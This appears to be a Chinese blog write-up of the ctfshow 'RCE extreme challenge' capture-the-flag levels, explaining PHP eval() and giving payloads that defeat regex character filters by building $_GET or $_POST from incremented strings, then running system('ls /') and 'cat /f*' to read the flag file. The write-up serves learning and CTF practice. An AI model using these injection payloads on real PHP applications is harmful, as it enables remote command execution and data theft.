您现在的位置是:首页 >学无止境 >ctfshow每周大挑战之RCE极限挑战网站首页学无止境

ctfshow每周大挑战之RCE极限挑战

XiaoXiao_RenHe 2023-05-16 14:33:33
简介ctfshow每周大挑战之RCE极限挑战

1、ctf.show每周大挑战之RCE极限挑战

php的eval()解释:

eval() 函数把字符串按照 PHP 代码来计算。

该字符串必须是合法的 PHP 代码,且必须以分号结尾。

return 语句会立即终止对字符串的计算。

返回值:除非在代码字符串中调用 return 语句,则返回传给 return 语句的值,否则返回 NULL。如果代码字符串中存在解析错误,则 eval() 函数返回 FALSE。

 2、RCE挑战1

如下图所示,POST传参时,参数名为code,后台对 "("、"." 做了替换。

 如何才能查找到想要的flag呢?执行远程命令使用  system('ls /'); 或使用反引号 `ls /`;

 如上图所示,使用post的code参数传参时,echo `ls /`,显示出系统命令执行的结果,看到有个f1agaaa文件,看似是flag文件,再查看该文件内容 echo `cat /f1agaaa`,这里也可以使用通配符进行内容查看 echo `cat /f*` ,获取到flag,如下图所示:

 3、RCE挑战2

如下图所示,POST传参时,参数名为ctf_show,后台对参数值做了正则匹配。

先确认哪些字符可传入。

<?php
for ($i=32;$i<127;$i++){
        if (!preg_match("/[a-zA-Z0-9@#%^&*:{}-<?>"|`~\\]/",chr($i))){
            echo chr($i)." ";
        }
}


//post可传入的字符如下:
// ! $ ' ( ) + , . / ; = [ ] _ 

从题目可以看出post传参被正则限制的厉害,想办法再同时进行get传参。使用数组绕过,获取数组名的第一个字符A,通过变量自增,组装$_GET[_],以便达到get传参,执行远程命令

$_=[]._;           //$_变量,[]默认表示数组名Array,._ 表示数组名Array拼接上字符'_'
var_dump($_);      //输出变量内容为:"Array_"
$__=$_['!'==','];  //里面判断结果为false,即$_[0],即取字符串"Array_"[0] 下标为0的字母,即"A",赋值给变量$__
$__++;$__++;$__++; //$__变量自增,值为B、C、D
$___=++$__;        //$___变量赋值为E,$__变量当前值为E
++$__;             //$__变量值自增,当前值为F
$___=++$__.$___;   //$__变量值自增,当前值为"G",拼接变量$___的值"E"后,再赋值给变量$___,其值为  "GE"
++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__; //$__变量自增,值为H、I、J、K、L、M、N、O、P、Q、R、S
$___=$___.++$__;   //$__变量值自增,当前值为T,$___变量的值"GE"拼接"T",再赋值给$___变量,其值为"GET"
$_='_'.$___;       //'_'拼接$___变量的值"GET",后再赋值给$_变量,其值为"_GET"
$$_[_]($$_[__]);   //即组装出$_GET[_]($_GET[__]),以便get传参,参数名为_和__,如_参数传参为system,__参数传参为ls /,即get传参后拼接出system('ls /')命令,以便eval去执行
//post传参
ctf_show=$_=[]._;$__=$_['!'==','];$__++;$__++;$__++;$___=++$__;++$__;$___=++$__.$___;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;$___=$___.++$__;$_='_'.$___;$$_[_]($$_[__]);

//get传参
?_=system&__=ls /

如下图所示,拼装了一个$_GET[_]($_GET[__]);组合,传递2个参数来达到执行 system('ls /');的目的(尝试只传递一个参数$_GET[_]接收 system("ls /")参数,访问时没什么反应,没想明白为何不行......)。

 如上图所示,get参数_system值,参数__ls /值,可以查看到根目录有个f1agaaa文件,貌似是flag文件,如下图所示,参数_system参数__cat /f1agaaa,打开得到falg。

//post传参
ctf_show=$_=[]._;$__=$_['!'==','];$__++;$__++;$__++;$___=++$__;++$__;$___=++$__.$___;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;$___=$___.++$__;$_='_'.$___;$$_[_]($$_[__]);

//get传参
?_=system&__=cat /f1agaaa

//或get传参
?_=system&__=cat /f*

4、RCE挑战3

如下图所示,POST传参时,参数名为ctf_show,后台对参数值做了正则匹配。

 先确认哪些字符可传入。

for ($i=32;$i<127;$i++){
        if (!preg_match("/[a-zA-Z2-9!'@#%^&*:{}-<?>"|`~\\]/",chr($i))){
            echo chr($i)." ";
        }
}

//post可传入的字符如下
//  0 $ 1 ( ) + , . / ; = [ ] _ 

从题目可以看出post传参被正则限制的厉害,想着同时进行get传参,但是限制了post参数长度(<=105)。使非数字绕过,_/_非法运算时返回NAN,通过变量自增,组装$_POST[_],以便达到post传参,执行远程命令

 注意:之前好奇为啥 $d1 = 'ab'.'cd'[0],输出值为"abc",这里涉及到运算优先级问题,'cd'[0]的值为"c",再和前面的'ab'拼接后,即"abc"。

$_=(_/_._)[0];  //$_变量的值为"NAN_"[0]的值,即值为"N"
$_0=++$_;       //$_变量自增后,值为"O",且再赋值给变量$_0,且其值为"O"
$_0=++$_.$_0;   //$_变量增增后,值为"P",再拼接变量$_0的值"O",再赋值给变量$_0,即值为"PO"
++$_;++$_;      //$_变量增增后,值为"Q"、"R"
$_0.=++$_;      //变量$_0变量的值为"PO",再拼接$_变量增增后的值"S",再赋值给变量$_0,即值为"POS"
$_0.=++$_;      //变量$_0变量的值为"POS",再拼接$_变量增增后的值"T",再赋值给变量$_0,即值为"POST"
$_=_.$_0;       //变量$_重新赋值为"_"拼接变量$_0的值"POST",即值为"_POST"
$$_[0]($$_[1]); //替换$_0变量的值"_POST"后,即组装出 $_POST[0]($_POST[1]),以便post传参,参数名为0和1,如0参数传参为system,1参数传参为ls /,即post传参后拼接出system('ls /')命令,以便eval去执行。
//post传参
ctf_show=$_=(_/_._)[0];$_0=++$_;$_0=++$_.$_0;++$_;++$_;$_0.=++$_;$_0.=++$_;$_=_.$_0;$$_[0]($$_[1]);&0=system&1=ls /

如下图所示,拼装了一个$_POST[0]($_POST[1]);组合,传递2个参数来达到执行 system('ls /');的目的(尝试只传递一个参数$_POST[0]接收 system("ls /")参数,访问时没什么反应,没想明白为何不行......)。

 如上图所示,post参数0system值,参数1ls /值,可以查看到根目录有个f1agaaa文件,貌似是flag文件,如下图所示,参数0system参数1cat /f*,打开得到falg。

//post传参
ctf_show=$_=(_/_._)[0];$_0=++$_;$_0=++$_.$_0;++$_;++$_;$_0.=++$_;$_0.=++$_;$_=_.$_0;$$_[0]($$_[1]);&0=system&1=cat /f*

疑问:post的参数再进行post传参不被正则过滤掉!?

 同理,也可以尝试使用该方法查找RCE挑战2的flag。

//post传参
ctf_show=$_=(_/_._)['!'==','];$__=++$_;$__=++$_.$__;++$_;++$_;$__.=++$_;$__.=++$_;$_=_.$__;$$_[_]($$_[__]);&_=system&__=cat /f*

5、RCE挑战4

如下图所示,POST传参时,参数名为ctf_show,后台对参数值做了正则匹配。

  先确认哪些字符可传入。

for ($i=32;$i<127;$i++){
    if (!preg_match("/[a-zA-Z1-9!'@#%^&*:{}-<?>"|`~\\]/",chr($i))){
        echo chr($i)." ";
    }
}

//post可传入的字符如下
//  $ ( ) + , . / 0 ; = [ ] _ 

从题目可以看出post传参被正则限制的厉害,想着同时进行get传参,但是限制了post参数长度(<=85)。使非数字绕过,_/_非法运算时返回NAN,通过变量自增,组装$_POST[_],以便达到post传参,执行远程命令

  注意:$__=$_.$_++(这里涉及3个运算符, 、  .    、  ++,其中++运算符优先级最高,$_++运算后,$_变量的值为"P",其中 .$_++,表示拼接变量$_自增前的值"O"

$_=(_/_._)[0];    //变量$_的值为"NAN_"[0],即值为"N"
++$_;             //变量$_的值自增后,值为"O"
$__=$_.$_++;      //变量$_的值自增后,值为"P",再拼接变量$_自增前的值"O",再赋值给变量$__,其值为"PO"
++$_;++$_;++$_;   //变量$_的值自增后,值为"Q"、"R"、"S"
$__.=$_++.$_;     //变量$_的值为"S",再拼接自增后的值"T",再拼接到变量$__(值为"PO")的后面,最后再赋值给变量$__,即值为"POST"
$_=_.$__;         //"_"拼接值为"POST"的变量$__,再赋值给变量$_,即值为"_POST"
$$_[_]($$_[0]);   替换$_变量的值"_POST"后,即组装出 $_POST[_]($_POST[0]),以便post传参,参数名为_和0,如_参数传参为system,0参数传参为ls /,即post传参后拼接出system('ls /')命令,以便eval去执行
//post传参
ctf_show=$_=(_/_._)[0];++$_;$__=$_.$_++;++$_;++$_;++$_;$__.=$_++.$_;$_=_.$__;$$_[_]($$_[0]);&_=system&0=ls /

如下图所示,拼装了一个$_POST[_]($_POST[0]);组合,传递2个参数来达到执行 system('ls /');的目的(尝试只传递一个参数$_POST[_]接收 system("ls /")参数,访问时没什么反应,没想明白为何不行......)。

  如上图所示,post参数_system值,参数0ls /值,可以查看到根目录有个f1agaaa文件,貌似是flag文件,如下图所示,参数_system参数0cat /f*,打开得到falg。

//post传参
ctf_show=$_=(_/_._)[0];++$_;$__=$_.$_++;++$_;++$_;++$_;$__.=$_++.$_;$_=_.$__;$$_[_]($$_[0]);&_=system&0=cat /f*

6、RCE挑战5

 如下图所示,POST传参时,参数名为ctf_show,后台对参数值做了正则匹配。

   先确认哪些字符可传入。

for ($i=32;$i<127;$i++){
    if (!preg_match("/[a-zA-Z0-9!'@#%^&*:{}-<?>"|`~\\]/",chr($i))){
        echo chr($i)." ";
    }
}

//post可传入的字符如下
// $ ( ) + , . / ; = [ ] _ 

 字符长度如何再减少呢?直接将_POST当做post参数的参数名

$_=(_/_._)[_];                     //变量$_的值为"NAN_"[0],即值为"N"
++$_;                              //变量$_的值自增后,值为"O"
$__=$_.$_++;                       //变量$_的值自增后,值为"P",再拼接变量$_自增前的值"O",再赋值给变量$__,其值为"PO"
++$_;++$_;                         //变量$_的值自增后,值为"Q"、"R"
$$_[$_=_.$__.++$_.++$_]($$_[_]);   //变量$_的值自增后,值为"S"、"T",并将其拼接到一起"ST",再拼接到$__变量(值为"PO")之后,即值为"POST",
                                   //在再前面拼接"_",即值为"_POST",并赋值给$_变量,再组装成$_POST[]($_POST[_])
//post传参
ctf_show=$_=(_/_._)[_];++$_;$__=$_.$_++;++$_;++$_;$$_[$_=_.$__.++$_.++$_]($$_[_]);

 

风语者!平时喜欢研究各种技术,目前在从事后端开发工作,热爱生活、热爱工作。